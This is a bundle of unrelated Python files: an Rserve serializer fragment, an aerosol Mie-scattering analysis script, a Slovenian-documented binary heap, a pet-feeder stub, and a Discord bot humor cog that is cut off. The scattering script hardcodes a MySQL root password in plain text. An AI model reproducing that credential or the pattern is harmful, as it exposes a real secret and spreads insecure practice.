s_func = self.serializeMap[rTypeHint]
except KeyError:
raise RSerializationError('Serialization of type "%s" not implemented' % rTypeHint)
startPos = self._fp.tell()
if DEBUG:
print 'Serializing expr %r with rTypeCode=%s using function %s' % (o, rTypeHint, s_func)
s_func(self, o, rTypeCode=rTypeHint)
# determine and return the length of actual R expression data:
return self._fp.tell() - startPos
@fmap(rtypes.XT_STR, rtypes.XT_SYMNAME)
def s_string_or_symbol(self, o, rTypeCode=rtypes.XT_STR):
'''
Possible rTypeCodes for a given string are:
- XT_STR
- XT_SYMNAME
'''
# The string packet contains trailing padding zeros to make it always a multiple of 4 in length:
paddedString = padString4(o)
length = len(paddedString)
self._writeDataHeader(rTypeCode, length)
if DEBUG:
print 'Writing string: %2d bytes: %s' % (length, repr(paddedString))
self._fp.write(paddedString)
@fmap(str, numpy.string_, rtypes.XT_ARRAY_STR)
def s_xt_array_str(self, o, rTypeCode=None):
# Works for single strings, lists of strings, and numpy arrays of strings (dtype 'S' or 'O')
if type(o) in [str, numpy.string_]:
# single string
o = [o]
zeroSeparatedString = '\0'.join(o)
padLength = padLen4(zeroSeparatedString)
length = len(zeroSeparatedString) + padLength
self._writeDataHeader(rtypes.XT_ARRAY_STR, length)
self._fp.write(zeroSeparatedString)
self._fp.write('\0\1\1\1'[:padLength])
def __s_xt_array_numeric_tag_data(self, o):
# Determine which tags the array must be given:
xt_tag_list = []
if o.ndim > 1:
xt_tag_list.append(('dim', numpy.array(o.shape, numpy.int32)))
if isinstance(o, TaggedArray):
xt_tag_list.append(('names', numpy.array(o.attr)))
attrFlag = rtypes.XT_HAS_ATTR if xt_tag_list else 0
rTypeCode = rtypes.numpyMap[o.dtype.type] | attrFlag
self._writeDataHeader(rTypeCode, 0)
if attrFlag:
self.s_xt_tag_list(xt_tag_list)
return rTypeCode
@fmap(rtypes.XT_ARRAY_CPLX, rtypes.XT_ARRAY_DOUBLE, rtypes.XT_ARRAY_INT)
def s_xt_array_numeric(self, o, rTypeCode=None):
'''
@param o: numpy array or subclass (e.g. TaggedArray)
@note: If o is multi-dimensional a tagged array is created. Also if o is of type TaggedArray.
'''
startPos = self._fp.tell()
rTypeCode = self.__s_xt_array_numeric_tag_data(o)
# TODO: make this also work on big endian machines (data must be written in little-endian!!)
self._fp.write(o.tostring())
length = self._fp.tell() - startPos - 4 # subtract length of header==4 bytes
self._fp.seek(startPos)
self._writeDataHeader(rTypeCode, length)
self._fp.seek(0, os.SEEK_END)
@fmap(rtypes.XT_ARRAY_BOOL)
def s_xt_array_boolean(self, o, rTypeCode=None):
'''
@param o: numpy array or subclass (e.g. TaggedArray) with boolean values
@note: If o is multi-dimensional a tagged array is created. Also if o is of type TaggedArray.
'''
startPos = self._fp.tell()
rTypeCode = self.__s_xt_array_numeric_tag_data(o)
# A boolean vector starts with its number of boolean values in the vector (as int32):
structCode = '<'+rtypes.structMap[int]
self._fp.write(struct.pack(structCode, len(o)))
# Then write the boolean values themselves:
data = o.tostring()
self._fp.write(data)
# Finally pad the binary data to be of a multiple of four in length:
self._fp.write(padLen4(data) * "\xff")
# Update the vector header:
length = self._fp.tell() - startPos - 4 # subtract length of header==4 bytes
self._fp.seek(startPos)
self._writeDataHeader(rTypeCode, length)
self._fp.seek(0, os.SEEK_END)
@fmap(int, float, numpy.float64, numpy.int32)
def s_atom_to_xt_array_numeric(self, o, rTypeCode=None):
'Render single numeric items into their corresponding array counterpart in r'
rTypeCode = rtypes.atom2ArrMap[type(o)]
structCode = '<'+rtypes.structMap[type(o)]
length = struct.calcsize(structCode)
self._writeDataHeader(rTypeCode, length)
self._fp.write(struct.pack(structCode, o))
@fmap(bool, numpy.bool_)
def s_atom_to_xt_array_boolean(self, o, rTypeCode=None):
"""Render single boolean items into their corresponding array counterpart in r.
Always convert a boolean atomic value into a specialized boolean R vector.
"""
arr = numpy.array([o])
self.s_xt_array_boolean(arr)
@fmap(list, TaggedList)
def s_xt_vector(self, o, rTypeCode=None):
'Render all objects of given python list into generic r vector'
startPos = self._fp.tell()
# remember start position for calculating length in bytes of entire list content
attrFlag = rtypes.XT_HAS_ATTR if o.__class__ == TaggedList else 0
self._writeDataHeader(rtypes.XT_VECTOR | attrFlag, 0)
if attrFlag:
self.s_xt_tag_list([('names', numpy.array(o.keys))])
for v in o:
self._serializeExpr(v)
length = self._fp.tell() - startPos
self._fp.seek(startPos)
# now write header again with correct length information
self._writeDataHeader(rtypes.XT_VECTOR | attrFlag, length - 4) # subtract 4 (omit list header!)
self._fp.seek(0, os.SEEK_END)
def s_xt_tag_list(self, o, rTypeCode=None):
startPos = self._fp.tell()
self._writeDataHeader(rtypes.XT_LIST_TAG, 0)
for tag, data in o:
self._serializeExpr(data)
self._serializeExpr(tag, rTypeHint=rtypes.XT_SYMNAME)
length = self._fp.tell() - startPos
self._fp.seek(startPos)
# now write header again with correct length information
self._writeDataHeader(rtypes.XT_LIST_TAG, length - 4) # subtract 4 (omit list header!)
self._fp.seek(0, os.SEEK_END)
############################################################
#### class methods for calling specific Rserv functions ####
@classmethod
def rEval(cls, aString, fp=None):
"""Create binary code for evaluating a string expression remotely in Rserve"""
s = cls(rtypes.CMD_eval, fp=fp)
s.serialize(aString, dtTypeCode=rtypes.DT_STRING)
return s.finalize()
@classmethod
def rAssign(cls, varname, o, fp=None):
"""Create binary code for assigning an expression to a variable remotely in Rserve"""
s = cls(rtypes.CMD_setSEXP, fp=fp)
s.serialize(varname, dtTypeCode=rtypes.DT_STRING)
s.serialize(o, dtTypeCode=rtypes.DT_SEXP)
return s.finalize()
@classmethod
def rSerializeResponse(cls, Rexp, fp=None):
# mainly used for unittesting
s = cls(rtypes.CMD_RESP | rtypes.RESP_OK, fp=fp)
s.serialize(Rexp, dtTypeCode=rtypes.DT_SEXP)
return s.finalize()
rEval = RSerializer.rEval
rAssign = RSerializer.rAssign
rSerializeResponse = RSerializer.rSerializeResponse
|
from pymiecoated import Mie
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
import mysql.connector
import math
import matplotlib.pyplot as plt
import matplotlib.colors
import calendar
from scipy.optimize import curve_fit
assumed_coating_th = [41,43,44,40,38,40,44,41,38,38] #nm sc1-7
assumed_coating_th = [43,57,50,57,51,47,46,40,30,17] #nm sc10
wavelength = 550 #nm
rBC_RI = complex(2.26,1.26)
savefig = False
show_distr_plots = False
min_alt = 0
max_alt = 5000
alt_incr = 500
bin_value_min = 80
bin_value_max = 220
bin_incr = 10
bin_number_lim = (bin_value_max-bin_value_min)/bin_incr
R = 8.3144621 # in m3*Pa/(K*mol)
flight_times = {
'science 1' : [datetime(2015,4,5,9,0),datetime(2015,4,5,14,0),15.6500, 78.2200] ,
}
cnx = mysql.connector.connect(user='root', password='Suresh15', host='localhost', database='black_carbon')
cursor = cnx.cursor()
def lognorm(x_vals, A, w, xc):
return A/(np.sqrt(2*math.pi)*w*x_vals)*np.exp(-(np.log(x_vals/xc))**2/(2*w**2))
def MieCalc(wavelength,core_dia,coat_th):
mie = Mie()
wl = wavelength
core_rad = core_dia/2 #nm
shell_thickness = coat_th
size_par = 2*math.pi*core_rad*1/wl
#Refractive indices PSL 1.59-0.0i rBC 2.26- 1.26i shell 1.5-0.0i
core_RI = rBC_RI
shell_rad = core_rad + shell_thickness
shell_RI = complex(1.5,0.0)
mie.x = 2*math.pi*core_rad/wl
mie.m = core_RI
mie.y = 2*math.pi*shell_rad/wl
mie.m2 = shell_RI
abs = mie.qabs()
abs_xs_nm2 = abs*math.pi*shell_rad**2 #in nm^2
abs_xs = abs_xs_nm2*1e-14 #in cm^2
sca = mie.qsca()
sca_xs_nm2 = sca*math.pi*shell_rad**2 #in nm^2
sca_xs = sca_xs_nm2*1e-14 #in cm^2
ext_xs = sca_xs+abs_xs
return [abs_xs,sca_xs,ext_xs]
fit_bins = []
for x in range (30,1000,1):
fit_bins.append(x)
plot_data={}
for flight in flight_times:
print flight
lower_alt = min_alt
start_time = flight_times[flight][0]
end_time = flight_times[flight][1]
UNIX_start_time = calendar.timegm(start_time.utctimetuple())
UNIX_end_time = calendar.timegm(end_time.utctimetuple())
alt = 0
while (lower_alt + alt_incr) <= max_alt:
#make data binning dicts for the interval
mass_binned_data = {}
number_binned_data = {}
i = bin_value_min
while i < bin_value_max:
mass_binned_data[i] = []
number_binned_data[i] = []
i+=bin_incr
#get mass data
cursor.execute(('SELECT bnm.70t80,bnm.80t90,bnm.90t100,bnm.100t110,bnm.110t120,bnm.120t130,bnm.130t140,bnm.140t150,bnm.150t160,bnm.160t170,bnm.170t180,bnm.180t190,bnm.190t200,bnm.200t210,bnm.210t220,bnm.sampled_vol,bnm.total_mass, ftd.temperature_C,ftd.BP_Pa from polar6_binned_mass_and_sampled_volume_alertcalib bnm join polar6_flight_track_details ftd ON bnm.flight_track_data_id = ftd.id WHERE ftd.alt >=%s and ftd.alt < %s and bnm.UNIX_UTC_ts >= %s and bnm.UNIX_UTC_ts < %s'),(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time))
mass_data = cursor.fetchall()
for row in mass_data:
volume_sampled = row[15]
total_mass = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
total_mass_conc_value = total_mass*correction_factor_for_STP/volume_sampled
#append STP corrected mass conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
mass_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#get number data
cursor.execute(('SELECT bnn.70t80,bnn.80t90,bnn.90t100,bnn.100t110,bnn.110t120,bnn.120t130,bnn.130t140,bnn.140t150,bnn.150t160,bnn.160t170,bnn.170t180,bnn.180t190,bnn.190t200,bnn.200t210,bnn.210t220,bnn.sampled_vol,bnn.total_number, ftd.temperature_C,ftd.BP_Pa from polar6_binned_number_and_sampled_volume_alertcalib bnn join polar6_flight_track_details ftd ON bnn.flight_track_data_id = ftd.id WHERE ftd.alt >=%s and ftd.alt < %s and bnn.UNIX_UTC_ts >= %s and bnn.UNIX_UTC_ts < %s'),(lower_alt,(lower_alt + alt_incr),UNIX_start_time,UNIX_end_time))
number_data = cursor.fetchall()
for row in number_data:
volume_sampled = row[15]
total_number = row[16]
temperature = row[17] + 273.15 #convert to Kelvin
pressure = row[18]
correction_factor_for_STP = (101325/pressure)*(temperature/273)
#append STP corrected number conc to dict of binned data
i=1
j=bin_value_min
while i <= bin_number_lim:
number_binned_data[j].append(row[i]*correction_factor_for_STP/volume_sampled)
i+=1
j+=10
#make lists from binned data and sort
binned_list = []
number_binned_list = []
for key in mass_binned_data:
abs_xsec = MieCalc(wavelength,(key+bin_incr/2),assumed_coating_th[alt])[0]
sca_xsec = MieCalc(wavelength,(key+bin_incr/2),assumed_coating_th[alt])[1]
abs_xsec_bare = MieCalc(wavelength,(key+bin_incr/2),0)[0]
sca_xsec_bare = MieCalc(wavelength,(key+bin_incr/2),0)[1]
binned_list.append([(key+bin_incr/2), np.mean(mass_binned_data[key]), np.mean(number_binned_data[key]), abs_xsec,sca_xsec, abs_xsec_bare,sca_xsec_bare])
binned_list.sort()
#optical constants for the measured mass range
optical_data_meas = []
for row in binned_list:
row[1] = row[1]/(math.log((row[0]+bin_incr/2))-math.log(row[0]-bin_incr/2)) #normalize mass
row[2] = row[2]/(math.log((row[0]+bin_incr/2))-math.log(row[0]-bin_incr/2)) #normalize number
bin_midpoint = row[0]
bin_mass = row[1] #in fg/cm3
bin_number = row[2] #in #/cm3
bin_abs_xsec = row[3] #in cm2
bin_sca_xsec = row[4] #in cm2
bin_abs_xsec_bare = row[5] #in cm2
bin_sca_xsec_bare = row[6] #in cm2
vol_abs_coeff = bin_number*bin_abs_xsec #in cm-1
vol_sca_coeff = bin_number*bin_sca_xsec #in cm-1
vol_abs_coeff_bare = bin_number*bin_abs_xsec_bare #in cm-1
vol_sca_coeff_bare = bin_number*bin_sca_xsec_bare #in cm-1
mass_abs_coeff_int = (vol_abs_coeff)/bin_mass #in cm2/fg
mass_abs_coeff = mass_abs_coeff_int*(10**11) #in m2/g
optical_data_meas.append([bin_midpoint,bin_mass,bin_number,vol_abs_coeff,vol_sca_coeff,vol_abs_coeff_bare,vol_sca_coeff_bare])
bin_midpoints = np.array([row[0] for row in optical_data_meas])
mass_concs = [row[1] for row in optical_data_meas]
mass_concs_sum = np.sum([row[1] for row in optical_data_meas])
number_concs = np.array([row[2] for row in optical_data_meas])
vol_abs_coeff_sum = np.sum([row[3] for row in optical_data_meas])
vol_sca_coeff_sum = np.sum([row[4] for row in optical_data_meas])
vol_abs_coeff_sum_bare = np.sum([row[5] for row in optical_data_meas])
vol_sca_coeff_sum_bare = np.sum([row[6] for row in optical_data_meas])
MAC_meas = vol_abs_coeff_sum*(10**11)/mass_concs_sum
SSA_meas = vol_sca_coeff_sum/(vol_sca_coeff_sum+vol_abs_coeff_sum)
MAC_meas_bare = vol_abs_coeff_sum_bare*(10**11)/mass_concs_sum
SSA_meas_bare = vol_sca_coeff_sum_bare/(vol_sca_coeff_sum_bare+vol_abs_coeff_sum_bare)
abs_enhancement_meas = vol_abs_coeff_sum/vol_abs_coeff_sum_bare
#fit mass distr with lognormal
#get Dg and sigma and write to dict
try:
popt, pcov = curve_fit(lognorm, bin_midpoints, mass_concs)
fit_binned_mass_concs = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_binned_mass_concs.append([bin,fit_val])
except:
print 'fit failure'
#fit number distr with lognormal
try:
popt, pcov = curve_fit(lognorm, bin_midpoints, number_concs)
fit_binned_number_concs = []
fit_binned_mass_concs_c = []
for bin in fit_bins:
fit_val = lognorm(bin, popt[0], popt[1], popt[2])
fit_binned_number_concs.append([bin,fit_val])
except:
print 'fit failure'
#optical constants for the extrapolated (from fit) full mass range
i=0
optical_data = []
for row in fit_binned_number_concs:
bin_midpoint = row[0]
bin_mass = fit_binned_mass_concs[i][1] #in fg/cm3
bin_number = row[1] #in #/cm3
abs_xsec = MieCalc(wavelength,bin_midpoint,assumed_coating_th[alt])[0]
sca_xsec = MieCalc(wavelength,bin_midpoint,assumed_coating_th[alt])[1]
abs_xsec_bare = MieCalc(wavelength,bin_midpoint,0)[0]
sca_xsec_bare = MieCalc(wavelength,bin_midpoint,0)[1]
vol_abs_coeff = bin_number*abs_xsec #in cm-1
vol_sca_coeff = bin_number*sca_xsec #in cm-1
vol_abs_coeff_bare = bin_number*abs_xsec_bare #in cm-1
vol_sca_coeff_bare = bin_number*sca_xsec_bare #in cm-1
mass_abs_coeff_int = (vol_abs_coeff)/bin_mass #in cm2/fg
mass_abs_coeff = mass_abs_coeff_int*(10**11) #in m2/g
optical_data.append([bin_mass,vol_abs_coeff,vol_sca_coeff,vol_abs_coeff_bare,vol_sca_coeff_bare,bin_midpoint])
i+=1
mass_concs_sum_calc = np.sum([row[0] for row in optical_data])
vol_abs_coeff_sum_calc = np.sum([row[1] for row in optical_data])
vol_sca_coeff_sum_calc = np.sum([row[2] for row in optical_data])
vol_abs_coeff_sum_calc_bare = np.sum([row[3] for row in optical_data])
vol_sca_coeff_sum_calc_bare = np.sum([row[4] for row in optical_data])
MAC_calc = vol_abs_coeff_sum_calc*(10**11)/mass_concs_sum_calc
SSA_calc = vol_sca_coeff_sum_calc/(vol_sca_coeff_sum_calc+vol_abs_coeff_sum_calc)
MAC_calc_bare = vol_abs_coeff_sum_calc_bare*(10**11)/mass_concs_sum_calc
SSA_calc_bare = vol_sca_coeff_sum_calc_bare/(vol_sca_coeff_sum_calc_bare+vol_abs_coeff_sum_calc_bare)
abs_enhancement_calc = vol_abs_coeff_sum_calc/vol_abs_coeff_sum_calc_bare
#add overall data to dict
mean_alt = lower_alt + alt_incr/2
print mean_alt
if mean_alt in plot_data:
plot_data[mean_alt].append([MAC_calc,SSA_calc,MAC_calc_bare,SSA_calc_bare,MAC_meas,SSA_meas,MAC_meas_bare,SSA_meas_bare,abs_enhancement_meas,abs_enhancement_calc])
else:
plot_data[mean_alt] = [[MAC_calc,SSA_calc,MAC_calc_bare,SSA_calc_bare,MAC_meas,SSA_meas,MAC_meas_bare,SSA_meas_bare,abs_enhancement_meas,abs_enhancement_calc]]
####plotting distrs if desired
fit_binned_mass_conc_vals = [row[1] for row in fit_binned_mass_concs]
fit_binned_number_conc_vals = [row[1] for row in fit_binned_number_concs]
if show_distr_plots == True:
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.semilogx(bin_midpoints,number_concs, color = 'g',marker='o')
ax1.semilogx(bin_midpoints,mass_concs, color = 'b',marker='o')
ax1.semilogx(fit_bins,fit_binned_mass_conc_vals, color = 'b',marker=None)
ax1.semilogx(fit_bins,fit_binned_number_conc_vals, color = 'g',marker=None)
plt.ylabel('dM/dlog(VED)')
ax1.set_xlabel('VED (nm)')
plt.show()
lower_alt += alt_incr
alt += 1
cnx.close()
print 'next step . . .'
plot_list = []
for mean_alt in plot_data:
mean_MAC_calc = np.mean([row[0] for row in plot_data[mean_alt]])
min_MAC_calc = mean_MAC_calc - np.min([row[0] for row in plot_data[mean_alt]])
max_MAC_calc = np.max([row[0] for row in plot_data[mean_alt]]) - mean_MAC_calc
mean_SSA_calc = np.mean([row[1] for row in plot_data[mean_alt]])
min_SSA_calc = mean_SSA_calc - np.min([row[1] for row in plot_data[mean_alt]])
max_SSA_calc = np.max([row[1] for row in plot_data[mean_alt]]) - mean_SSA_calc
mean_MAC_calc_bare = np.mean([row[2] for row in plot_data[mean_alt]])
min_MAC_calc_bare = mean_MAC_calc_bare - np.min([row[2] for row in plot_data[mean_alt]])
max_MAC_calc_bare = np.max([row[2] for row in plot_data[mean_alt]]) - mean_MAC_calc_bare
mean_SSA_calc_bare = np.mean([row[3] for row in plot_data[mean_alt]])
min_SSA_calc_bare = mean_SSA_calc_bare - np.min([row[3] for row in plot_data[mean_alt]])
max_SSA_calc_bare = np.max([row[3] for row in plot_data[mean_alt]]) - mean_SSA_calc_bare
mean_MAC_meas = np.mean([row[4] for row in plot_data[mean_alt]])
min_MAC_meas = mean_MAC_meas - np.min([row[4] for row in plot_data[mean_alt]])
max_MAC_meas = np.max([row[4] for row in plot_data[mean_alt]]) - mean_MAC_meas
mean_SSA_meas = np.mean([row[5] for row in plot_data[mean_alt]])
min_SSA_meas = mean_SSA_meas - np.min([row[5] for row in plot_data[mean_alt]])
max_SSA_meas = np.max([row[5] for row in plot_data[mean_alt]]) - mean_SSA_meas
mean_MAC_meas_bare = np.mean([row[6] for row in plot_data[mean_alt]])
min_MAC_meas_bare = mean_MAC_meas_bare - np.min([row[6] for row in plot_data[mean_alt]])
max_MAC_meas_bare = np.max([row[6] for row in plot_data[mean_alt]]) - mean_MAC_meas_bare
mean_SSA_meas_bare = np.mean([row[7] for row in plot_data[mean_alt]])
min_SSA_meas_bare = mean_SSA_meas_bare - np.min([row[7] for row in plot_data[mean_alt]])
max_SSA_meas_bare = np.max([row[7] for row in plot_data[mean_alt]]) - mean_SSA_meas_bare
mean_abse_meas = np.mean([row[8] for row in plot_data[mean_alt]])
mean_abse_calc = np.mean([row[9] for row in plot_data[mean_alt]])
plot_list.append([mean_alt,mean_MAC_calc,mean_SSA_calc,mean_MAC_calc_bare,mean_SSA_calc_bare,mean_MAC_meas,mean_SSA_meas,mean_MAC_meas_bare,mean_SSA_meas_bare,mean_abse_calc,mean_abse_meas])
plot_list.sort()
altitudes = [row[0] for row in plot_list]
MAC_calc_mean = [row[1] for row in plot_list]
SSA_calc_mean = [row[2] for row in plot_list]
MAC_calc_mean_bare = [row[3] for row in plot_list]
SSA_calc_mean_bare = [row[4] for row in plot_list]
MAC_meas_mean = [row[5] for row in plot_list]
SSA_meas_mean = [row[6] for row in plot_list]
MAC_meas_mean_bare = [row[7] for row in plot_list]
SSA_meas_mean_bare = [row[8] for row in plot_list]
mean_abse_calc = [row[9] for row in plot_list]
mean_abse_meas = [row[10] for row in plot_list]
fig = plt.figure(figsize=(10,10))
ax1 = plt.subplot2grid((2,2), (0,0), colspan=1)
ax2 = plt.subplot2grid((2,2), (0,1), colspan=1)
ax3 = plt.subplot2grid((2,2), (1,0), colspan=1)
ax1.plot(MAC_calc_mean,altitudes,marker='o',linestyle='-', color = 'b', label = 'coated rBC')
ax1.plot(MAC_calc_mean_bare,altitudes,marker='o',linestyle='--', color = 'b',alpha = 0.5, label = 'bare rBC')
ax1.set_ylabel('altitude (m)')
ax1.set_xlabel('MAC (m2/g)')
ax1.set_xlim(5,18)
ax1.set_ylim(0,5000)
handles, labels = ax1.get_legend_handles_labels()
ax1.legend(handles, labels,loc=7)
ax2.plot(SSA_calc_mean,altitudes,marker='o',linestyle='-', color = 'b')
ax2.plot(SSA_calc_mean_bare,altitudes,marker='o',linestyle='--', color = 'b',alpha = 0.5)
ax2.set_xlabel('SSA')
ax2.set_ylabel('altitude (m)')
ax2.set_xlim(0.38,0.5)
ax2.set_ylim(0,5000)
ax3.plot(mean_abse_calc,altitudes,marker='o',linestyle='-', color = 'b')
ax3.set_xlabel('absorption enhancement')
ax3.set_ylabel('altitude (m)')
ax3.set_xlim(1.3,1.7)
ax3.set_ylim(0,5000)
dir = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/'
os.chdir(dir)
if savefig == True:
plt.savefig('MAC SSA abs enhancement - Sc 1-7 full mass range.png', bbox_inches='tight')
plt.show()
|
from typing import Generic, TypeVar, Dict, Sized, Tuple
from typing import List
T = TypeVar("T")
InternalEntry = Tuple[float, int, T]
Entry = Tuple[T, float]
class BinaryHeap(Generic[T], Sized):
"""
Dvojiška kopica z najmanjšo vrednostjo na vrhu.
Kopica je predstavljena s seznamom,
v katerem je i-ti vnos manjši od vnosov z indeksoma 2*i+1 in 2*i+2.
Vsak vnos je trojica (vrednost, stevec, element),
kjer je števec določen z vrstnim redom vnašanja
in preprečuje primerjanje neprimerljivih elementov.
"""
def __init__(self, slovar: Dict[T, float] = None) -> None:
"""
Inicializacija kopice.
Elemente in vrednosti iz podanega slovarja organizira v kopico tako,
da izvede spuščanje vsakega elementa od zadnjega proti prvemu.
Časovna zahtevnost: O(n)
"""
if slovar is None or len(slovar) == 0:
self.seznam = [] # type: List[InternalEntry]
self.indeksi = {} # type: Dict[T, int]
else:
self.seznam = [(v, i, e) for i, (e, v)
in enumerate(slovar.items())]
self.indeksi = {x[2]: i for i, x in enumerate(self.seznam)}
for i in reversed(range(len(self.seznam) // 2)):
self.siftDown(i)
self.stevec = len(self.seznam)
def __len__(self) -> int:
"""
Velikost kopice.
Časovna zahtevnost: O(1)
"""
return len(self.seznam)
def __repr__(self) -> str:
"""
Znakovna predstavitev kopice.
Časovna zahtevnost: O(n)
"""
return '[%s]' % ', '.join("%s: %s" % (e, v) for v, s, e in self.seznam)
def __contains__(self, element: T) -> bool:
"""
Preveri, ali je element v kopici.
Časovna zahtevnost: O(1)
"""
return element in self.indeksi
def __getitem__(self, element: T) -> float:
"""
Vrne vrednost, ki je v kopici dodeljena elementu.
Časovna zahtevnost: O(1)
"""
return self.seznam[self.indeksi[element]][0]
def __setitem__(self, element: T, vrednost: float) -> None:
"""
Nastavi vrednost elementu v kopici.
Če element že obstaja, mu nastavi novo vrednost
ter glede na staro vrednost ustrezno popravi kopico.
Če element še ne obstaja,
ga doda na konec kopice ter ga dvigne do ustreznega mesta.
Časovna zahtevnost: O(log(n))
"""
if element in self.indeksi:
i = self.indeksi[element]
v, s, e = self.seznam[i]
self.replace(i, (vrednost, s, e))
else:
l = len(self.seznam)
self.indeksi[element] = l
self.seznam.append((vrednost, self.stevec, element))
self.stevec += 1
self.bubbleUp(l)
def __delitem__(self, element: T) -> None:
"""
Odstrani element iz kopice.
Odstrani zadnji element kopice ter z njim prepiše brisani element,
nato pa glede na vrednosti ustrezno popravi kopico.
Časovna zahtevnost: O(log(n))
"""
i = self.indeksi.pop(element)
vnos = self.seznam.pop()
if i < len(self.seznam):
self.replace(i, vnos)
def replace(self, i: int, vnos: InternalEntry) -> None:
"""
Nadomesti vnos na mestu i z novim vnosom.
Glede na vrednosti v starem in novem vnosu
slednjega bodisi spusti ali dvigne do ustreznega mesta.
Časovna zahtevnost O(log(i) + log(n/i))
"""
star = self.seznam[i]
self.seznam[i] = vnos
self.indeksi[vnos[2]] = i
if star < vnos:
self.siftDown(i)
else:
self.bubbleUp(i)
def peek(self) -> Entry:
"""
Vrne element na vrhu kopice in njegovo vrednost.
Časovna zahtevnost: O(1)
"""
vrednost, stevec, element = self.seznam[0]
return (element, vrednost)
def pop(self) -> Entry:
"""
Odstrani in vrne element na vrhu kopice in njegovo vrednost.
Časovna zahtevnost: O(log(n))
"""
vrednost, stevec, element = self.seznam[0]
del self[element]
return (element, vrednost)
def bubbleUp(self, i: int) -> None:
"""
Dvigne element na mestu i do ustreznega mesta.
Časovna zahtevnost: O(log(i))
"""
j = (i - 1) // 2
while i > 0 and self.seznam[j] > self.seznam[i]:
self.seznam[i], self.seznam[j] = self.seznam[j], self.seznam[i]
self.indeksi[self.seznam[i][2]] = i
self.indeksi[self.seznam[j][2]] = j
i = j
j = (i - 1) // 2
def siftDown(self, i: int) -> None:
"""
Spusti element na mestu i do ustreznega mesta.
Časovna zahtevnost: O(log(n/i))
"""
l = len(self.seznam)
j = 2 * i + 1
while j < l:
k = j + 1
if k < l and self.seznam[j] > self.seznam[k]:
j = k
if self.seznam[i] < self.seznam[j]:
return
self.seznam[i], self.seznam[j] = self.seznam[j], self.seznam[i]
self.indeksi[self.seznam[i][2]] = i
self.indeksi[self.seznam[j][2]] = j
i = j
j = 2 * i + 1
|
import time
import callServer
POLL_FREQ_IN_S = 5
MIN_TIME_THRESHOLD = 1
WEIGHT_THRESHOLD_IN_G = 100
FEEDING_FREQ = 12
def getData():
return 0
def notify():
callServer.BoomerIsFed()
def run(debug=False):
# Get data from the sensor
data = getData()
thresholdTime = 0
while(True):
time.sleep(POLL_FREQ_IN_S)
if (data > WEIGHT_THRESHOLD_IN_G):
thresholdTime += 1
if(thresholdTime > MIN_TIME_THRESHOLD):
notify()
thresholdTime = 0
else:
if debug:
print "continue"
continue
run(True)
|
import asyncio
import discord
import random
import urllib
import requests
import json
import time
import os
from discord.ext import commands
from Cogs import Message
from Cogs import FuzzySearch
from Cogs import GetImage
from Cogs import Nullify
class Humor:
def __init__(self, bot, settings, listName = "Adjectives.txt"):
self.bot = bot
self.settings = settings
# Setup our adjective list
self.adj = []
marks = map(chr, range(768, 879))
self.marks = list(marks)
if os.path.exists(listName):
with open(listName) as f:
for line in f:
self.adj.append(line)
@commands.command(pass_context=True)
async def zalgo(self, ctx, *, message = None):
"""Ỉ s̰hͨo̹u̳lͪd͆ r͈͍e͓̬a͓͜lͨ̈l̘̇y̡͟ h͚͆a̵͢v͐͑eͦ̓ i͋̍̕n̵̰ͤs͖̟̟t͔ͤ̉ǎ͓͐ḻ̪ͨl̦͒̂ḙ͕͉d͏̖̏ ṡ̢ͬö̹͗m̬͔̌e̵̤͕ a̸̫͓͗n̹ͥ̓͋t̴͍͊̍i̝̿̾̕v̪̈̈͜i̷̞̋̄r̦̅́͡u͓̎̀̿s̖̜̉͌..."""
if message == None:
await ctx.send("Usage: `{}zalgo [message]`".format(ctx.prefix))
return
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
words = message.split()
try:
iterations = int(words[len(words)-1])
words = words[:-1]
except Exception:
iterations = 1
if iterations > 100:
iterations = 100
if iterations < 1:
iterations = 1
zalgo = " ".join(words)
for i in range(iterations):
if len(zalgo) > 2000:
break
zalgo = self._zalgo(zalgo)
zalgo = zalgo[:2000]
# Check for suppress
if suppress:
zalgo = Nullify.clean(zalgo)
await Message.say(self.bot, zalgo, ctx.message.channel, ctx.message.author, 1, 2000, 5)
#await ctx.send(zalgo)
def _zalgo(self, text):
words = text.split()
zalgo = ' '.join(''.join(c + ''.join(random.choice(self.marks)
for _ in range(i // 2 + 1)) * c.isalnum()
for c in word)
for i, word in enumerate(words))
return zalgo
@commands.command(pass_context=True)
async def holy(self, ctx, *, subject : str = None):
"""Time to backup the Batman!"""
if subject == None:
await ctx.channel.send("Usage: `{}holy [subject]`".format(ctx.prefix))
return
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(ctx.message.guild, "SuppressMentions").lower() == "yes":
suppress = True
else:
suppress = False
matchList = []
for a in self.adj:
if a[:1].lower() == subject[:1].lower():
matchList.append(a)
if not len(matchList):
# Nothing in there - get random entry
# msg = "*Whoah there!* That was *too* holy for Robin!"
word = random.choice(self.adj)
word = word.strip().capitalize()
subject = subject.strip().capitalize()
msg = "*Holy {} {}, Batman!*".format(word, subject)
else:
# Get a random one
word = random.choice(matchList)
word = word.strip().capitalize()
subject = subject.strip().capitalize()
msg = "*Holy {} {}, Batman!*".format(word, subject)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await ctx.channel.send(msg)
@commands.command(pass_context=True)
async def fart(self, ctx):
"""PrincessZoey :P"""
fartList = ["Poot", "Prrrrt", "Thhbbthbbbthhh", "Plllleerrrrffff", "Toot", "Blaaaaahnk", "Squerk"]
randnum = random.randint(0, len(fartList)-1)
msg = '{}'.format(fartList[randnum])
await ctx.channel.send(msg)
def canDisplay(self, server):
# Check if we can display images
lastTime = int(self.settings.getServerStat(server, "LastPicture"))
threshold = int(self.settings.getServerStat(server, "PictureThreshold"))
if not GetImage.canDisplay( lastTime, threshold ):
# await self.bot.send_message(channel, 'Too many images at once - please wait a few seconds.')
return False
# If we made it here - set the LastPicture method
self.settings.setServerStat(server, "LastPicture", int(time.time()))
return True
@commands.command(pass_context=True)
async def memetemps(self, ctx):
"""Get Meme Templates"""
